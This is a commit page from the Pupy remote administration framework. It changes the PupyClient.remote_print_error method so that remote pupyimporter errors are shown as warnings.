display remote pupyimporter errors as warning

This commit is contained in:
n1nj4sec 2017-04-24 20:02:37 +02:00
parent 7df37c5194
commit f4b716078f
1 changed files with 1 additions and 1 deletions

View File

@ -288,7 +288,7 @@ class PupyClient(object):
return dic
def remote_print_error(self, msg):
self.pupsrv.handler.display_error(msg)
self.pupsrv.handler.display_warning(msg)
def _get_module_dic(self, search_path, start_path, pure_python_only=False, remote=False, check_server_arch=False):
modules_dic = {}